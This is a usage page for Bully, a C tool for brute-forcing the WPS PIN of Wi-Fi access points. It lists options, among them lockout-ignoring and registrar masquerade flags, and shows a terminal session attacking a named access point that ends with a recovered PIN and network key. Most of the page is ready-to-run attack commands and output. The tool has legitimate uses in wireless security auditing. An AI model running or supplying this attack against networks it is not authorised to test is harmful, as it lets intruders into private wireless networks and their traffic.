Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs in that it exploits the (now well-known) design flaw in the WPS specification. It has several advantages over the original Reaver code: fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux and was specifically developed to run on embedded Linux systems (OpenWrt, etc.) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
bully <options> interface
Required arguments:

    interface               : Wireless interface in monitor mode (root required)

    -b, --bssid macaddr     : MAC address of the target access point
  Or
    -e, --essid string      : Extended SSID for the access point

Optional arguments:

    -c, --channel N[,N...]  : Channel number of AP, or list to hop [b/g]
    -l, --lockwait N        : Seconds to wait if the AP locks WPS
    -p, --pin N             : Index of pin to start at (7 digits) [Auto]
    -s, --source macaddr    : Source (hardware) MAC address [Probe]
    -v, --verbosity N       : Verbosity level 1-3, 1 is quietest
    -w, --workdir           : Location of pin/session files [~/.bully/]
    -5, --5ghz              : Hop on 5GHz a/n default channel list [No]
    -F, --fixed             : Fixed channel operation (do not hop) [No]
    -S, --sequential        : Sequential pins (do not randomize) [No]
    -T, --test              : Test mode (do not inject any packets) [No]

Advanced arguments:

    -a, --acktime N         : Acknowledgement and pcap timeout (ms)
    -r, --retries N         : Resend packets N times when not acked
    -m, --m13time N         : M1/M3/Initial beacon timeout (ms)
    -t, --timeout N         : Timeout for Auth/Assoc/Id/M5/M7 (ms)
    -1, --pin1delay M,N     : Delay M seconds every Nth nack at M5 [0,1]
    -2, --pin2delay M,N     : Delay M seconds every Nth nack at M7 [5,1]
    -A, --noacks            : Disable ACK check for sent packets [No]
    -C, --nocheck           : Skip CRC/FCS validation (performance) [No]
    -D, --detectlock        : Detect WPS lockouts unreported by AP [No]
    -E, --eapfail           : EAP Failure terminate every exchange [No]
    -L, --lockignore        : Ignore WPS locks reported by the AP [No]
    -M, --m57nack           : M5/M7 timeouts treated as WSC_NACK's [No]
    -N, --nofcs             : Packets don't contain the FCS field [Auto]
    -P, --probe             : Use probe request for nonbeaconing AP [No]
    -R, --radiotap          : Assume radiotap headers are present [Auto]
    -W, --windows7          : Masquerade as a Windows 7 registrar [No]

    -h, --help              : Display this help information
cyborg@cyborg:~$ sudo bully mon0 -b 10:FE:ED:B7:A5:42 -e tempztrela -c 1
[+] Switching interface 'mon0' to channel '1'
[!] Using '00:c0:ca:75:9f:e2' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '10:fe:ed:b7:a5:42' on channel '1'
[+] Got beacon for 'tempztrela' (10:fe:ed:b7:a5:42)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '80218142'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '92878143'
[!] Received disassociation/deauthentication from the AP
[+] Tx(DeAuth) = 'NoAssoc' Next pin '92878143'
[!] Unexpected packet received when waiting for WPS Message
[!] >00001a002f48000003ddde0a0000000010026c09c000db0100000802ca0000c0ca759fe210feedb7a54210feedb7a5421000aaaa0300000086dd6000000000183afffe800000000000000000000000000001ff020000000000000000000000000001860096774098001e0000000000000000010110feedb7a542846325bf<
[+] Rx( M1 ) = 'WPSFail' Next pin '92878143'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '28738145'
[+] Rx( M5 ) = 'Pin1Bad' Next pin '63058147'
[!] Received disassociation/deauthentication from the AP
[+] Rx( Auth ) = 'NoAssoc' Next pin '63058147'
[!] Unexpected packet received when waiting for WPS Message
[!] >00001a002f480000c467220b0000000010026c09c000c60100000802ca0000c0ca759fe210feedb7a54210feedb7a5422000aaaa0300000086dd6000000000183afffe800000000000000000000000000001ff020000000000000000000000000001860096774098001e0000000000000000010110feedb7a5420d0dce95<
[+] Rx( M1 ) = 'WPSFail' Next pin '63058147'
[!] Unexpected packet received when waiting for WPS Message
[!] >00001a002f480000ae7d300b0000000010026c09c000df0100000802ca0000c0ca759fe210feedb7a54274de2bc3a02f2000aaaa0300000086dd6000000000203afffe80000000000000cca5e8db60581843ff0200000000000000000001ff00000187000dad00000000fe800000000000000000000000000001010174de2bc3a02fa73734cb<
[+] Rx(M2D/M3) = 'WPSFail' Next pin '63058147'
[+] Rx(M2D/M3) = 'Timeout' Next pin '63058147'
Saved session to '/root/.bully/10:fe:ed:b7:a5:42.run'
PIN: '254784781'
KEY: '123456789'